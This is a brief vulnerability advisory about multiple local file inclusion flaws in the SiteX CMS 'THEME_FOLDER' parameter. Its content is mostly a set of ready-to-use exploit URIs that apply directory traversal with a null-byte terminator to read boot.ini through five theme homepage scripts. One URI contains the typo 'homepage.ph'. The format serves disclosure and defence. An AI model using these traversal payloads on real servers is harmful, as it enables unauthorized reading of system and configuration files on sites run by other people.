SiteX 'THEME_FOLDER' Parameter Multiple Local File Include Vulnerabilities

SiteX 'THEME_FOLDER' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Joombo/homepage.ph?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00